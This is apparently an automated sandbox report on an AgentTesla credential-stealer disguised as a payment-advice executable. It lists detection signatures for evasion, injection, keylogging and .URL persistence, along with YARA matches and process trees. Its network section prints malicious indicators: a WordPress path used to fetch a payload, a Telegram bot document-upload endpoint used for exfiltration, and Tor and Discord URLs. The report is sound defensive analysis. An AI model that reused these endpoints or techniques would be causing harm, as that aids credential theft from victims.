Loading ...

Play interactive tourEdit tour

Analysis Report USD67,884.08_Payment_Advise_9083008849.exe

Overview

General Information

Sample Name:USD67,884.08_Payment_Advise_9083008849.exe
Analysis ID:321416
MD5:947edeb169369ac67c5448cc2f8104a3
SHA1:5d2181f018ab4b8afd6b193e4651233b44ad7d62
SHA256:3a89a79e825bf330e3ea46f6a5f548529b642dc61219a8deeaec070a0688a08e
Tags:AgentTeslaexeHSBC

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • Uclldrv.exe (PID: 6756 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe' MD5: 947EDEB169369AC67C5448CC2F8104A3)
    • Uclldrv.exe (PID: 6868 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe MD5: 947EDEB169369AC67C5448CC2F8104A3)
  • Uclldrv.exe (PID: 5900 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe' MD5: 947EDEB169369AC67C5448CC2F8104A3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\llcU.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\llcU.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\llcU.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.Uclldrv.exe.25f0000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              18.2.Uclldrv.exe.25f0000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.USD67,884.08_Payment_Advise_9083008849.exe.4a10000.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  18.2.Uclldrv.exe.4f00000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    5.2.USD67,884.08_Payment_Advise_9083008849.exe.23e0000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeReversingLabs: Detection: 22%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: USD67,884.08_Payment_Advise_9083008849.exeVirustotal: Detection: 40%Perma Link
                      Source: USD67,884.08_Payment_Advise_9083008849.exeReversingLabs: Detection: 22%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: USD67,884.08_Payment_Advise_9083008849.exeJoe Sandbox ML: detected
                      Source: 13.2.Uclldrv.exe.2ab0000.5.unpackAvira: Label: TR/Hijacker.Gen
                      Source: 13.2.Uclldrv.exe.45e0000.6.unpackAvira: Label: TR/Dropper.Gen
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then xor edx, edx
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then xor edx, edx
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then xor edx, edx
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor edx, edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor edx, edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor edx, edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor edx, edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor edx, edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then xor eax, eax
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: global trafficHTTP traffic detected: GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1Host: airseaalliance.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1Host: airseaalliance.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1Host: airseaalliance.comCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                      Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
                      Source: global trafficHTTP traffic detected: GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1Host: airseaalliance.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1Host: airseaalliance.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1Host: airseaalliance.comCache-Control: no-cache
                      Source: unknownDNS traffic detected: queries for: discord.com
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.co
                      Source: Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-adm0
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/t
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twent
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-se
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-sevent8
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/7009$
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll0848
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374H
                      Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8
                      Source: Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpString found in binary or memory: http://hHeaxI.com
                      Source: Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                      Source: Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/
                      Source: Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/J
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: Yara matchFile source: Process Memory Space: Uclldrv.exe PID: 6756, type: MEMORY

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: USD67,884.08_Payment_Advise_9083008849.exe
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ECBAC4
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ECBA44
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ECBA42
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC9170
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC9931
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED6E58
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED6E58
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EBFEC0
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EBFEC0
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00408C60
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040DC11
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00407C3F
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00418CCC
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00406CA0
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004028B0
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0041A4BE
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00418244
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00401650
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00402F20
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004193C4
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00418788
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00402F89
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00402B90
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004073A0
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_022A0C60
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_022A0C50
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_04A80006
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_04A80040
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_05A82D58
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_05A84C70
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_05A82140
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_05A82488
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F1BAC4
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F1BA42
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F1BA44
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F19170
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F19931
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F26E58
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F26E58
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F0FEC0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 13_3_03F0FEC0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 16_3_03F4BAC4
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 16_3_03F4BA44
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 16_3_03F4BA42
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 16_3_03F49931
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00408C60
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00407C3F
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_004028B0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00418244
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00401650
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00402F20
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_004193C4
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00418788
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00402F89
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00402B90
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_004073A0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_02340C60
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_02340C50
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_04F90040
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_04F9003A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_04F99283
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_05A82FA0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_05A82388
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_05A84EB0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_05A826D0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00408C60
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_0040DC11
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00407C3F
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00418CCC
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00406CA0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_004028B0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_0041A4BE
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00418244
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00401650
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00402F20
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_004193C4
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00418788
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00402F89
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_00402B90
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_1_004073A0
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: String function: 0040D606 appears 48 times
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: String function: 0040E1D8 appears 88 times
                      Source: USD67,884.08_Payment_Advise_9083008849.exeStatic PE information: invalid certificate
                      Source: USD67,884.08_Payment_Advise_9083008849.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: Uclldrv.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameygwxuBNDsCnleMFrPILFrkECdmuYRRQwMZPAraQ.exe4 vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468624139.0000000002490000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477770135.0000000005620000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewbemdisp.tlbj% vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468661954.00000000024A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.469808808.000000000262A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.469808808.000000000262A000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.469808808.000000000262A000.00000004.00000001.sdmpBinary or memory string: m,\\StringFileInfo\\040904B0\\OriginalFilename vs USD67,884.08_Payment_Advise_9083008849.exe
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeSection loaded: mscorjit.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeSection loaded: mscorjit.dll
                      Source: 0000000D.00000002.362836092.0000000002AC7000.00000020.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                      Source: 0000000D.00000002.362836092.0000000002AC7000.00000020.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                      Source: C:\Users\user\AppData\Local\llcU.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                      Source: C:\Users\user\AppData\Local\llcU.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                      Source: C:\Users\user\AppData\Local\llcU.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/5@6/4
